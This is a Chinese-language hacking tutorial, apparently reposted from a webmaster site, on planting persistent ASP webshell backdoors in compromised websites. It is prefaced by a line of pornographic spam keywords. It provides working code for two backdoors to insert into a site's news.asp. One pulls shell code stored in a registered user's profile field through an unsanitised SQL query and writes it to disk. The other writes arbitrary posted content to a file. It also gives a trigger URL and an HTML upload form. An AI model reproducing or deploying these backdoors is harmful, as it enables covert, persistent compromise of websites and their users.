欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

前言：好長(cháng)時(shí)間了，從剛開(kāi)始的站點(diǎn)管理器到現在流行的幾款asp后門(mén)，相信大多網(wǎng)管都能說(shuō)出這些經(jīng)典webshell的名字，如海洋、老兵、藍屏等,也相信大多數的網(wǎng)管學(xué)會(huì )了關(guān)鍵字的搜索方法來(lái)搜索這些木馬，當然現在的時(shí)間如果再象隱藏后門(mén)就要講些技巧啦，俗話(huà)說(shuō)的好“佛高一尺，我高一丈”。

我不否認n早前的那個(gè)把asp木馬寫(xiě)到圖片文件中不失為一種好的方法，其實(shí)不僅可以寫(xiě)到圖片啦寫(xiě)到mp3文件里寫(xiě)到doc文件里都是可以的啦。

copy 文件名/參數 + 文件名/參數 生成文件名

這樣的方法可以很靈活的運用來(lái)達到隱藏文件的目的，具體的參數就是/a以acsic碼方式，/b二進(jìn)制方式，就不羅嗦這些了，至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍。今天要講的是如何把后門(mén)放到后綴.mdb的數據庫中，前提是在我們拿到一個(gè)webshell之后……

我們所知道的，很多站點(diǎn)在用戶(hù)注冊的時(shí)候要讓填好多東西例如：用戶(hù)名、密碼、QQ、郵箱、個(gè)人簡(jiǎn)介、電話(huà)、聯(lián)系方式、住址一類(lèi)的。而對應到數據庫中也都會(huì )有相應的表、字段、值。我今天要做的就是，我注冊一個(gè)用戶(hù)在我的個(gè)人簡(jiǎn)介的地方上寫(xiě)入shell代碼，然后修改他站點(diǎn)上的一個(gè)文件，使用的時(shí)候觸發(fā)這個(gè)文件，就把我個(gè)人簡(jiǎn)歷中的shell代碼，備份到當前目錄下。

廢話(huà)少說(shuō)了，大家看代碼：

<%
if request("action")="firefox" then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
set rs=server.createobject("ADODB.recordset")
sql="select "& bname & " from "&tname& " where "&id&"="&idvalue&""""
rs.open sql,conn,1,3
if not rs.eof then
content=rs(bname)
else
response.write "Nothing"
end if
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
end if
%>

將上邊的代碼加到站點(diǎn)的一個(gè)文件中，如news.asp。根據我們了解的信息，在其站點(diǎn)注冊后，下載數據庫看結構。我注冊的firefox名字是在 user表，其id值為119 用于存放我注冊簡(jiǎn)歷的表字段為jl。

news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119

那么在使用的時(shí)候我們就可以在news.asp相同目錄下寫(xiě)入一個(gè)名為 firefox.asp的webshell。以上可以說(shuō)是萬(wàn)千隱藏方法中的一種，下邊再說(shuō)另外一種更方便的隱藏方法，這個(gè)方法就和mdb后綴無(wú)關(guān)系了。

同樣我們還是修改news.asp，將以下代碼插入到對方news.asp中：

<%
if request("action")="firefox" then
n=request.form("n")
c=request.form("c")
set fso=Server.createObject("Scripting.FileSystemObject")
set txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
end if
%>

這段代碼相對簡(jiǎn)單些，算是一個(gè)木馬的服務(wù)端吧。使用的時(shí)候以這段代碼配合：

<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<title>F.s.t火狐技術(shù)聯(lián)盟[www.wrsky.com]</title>
<FORM action="http://localhost/config.asp?action ... method=post>
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Name:<INPUT size=50
name=n width="32"><BR><BR>Shell:<TEXTAREA name=c rows=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>

將以上代碼中的：“http://localhost/config.asp?action=firefox”替換成你的服務(wù)端地址，然后保存為本地的.htm文件。本地打開(kāi)后定義要生成的文件名、文件內容、遠程提交， ok，又是一種留后門(mén)的方法。

本文來(lái)自: 站長(cháng)之家(http://www.doozz.com) 詳細出處參考：http://www.doozz.com/View/30/30010102/1359.html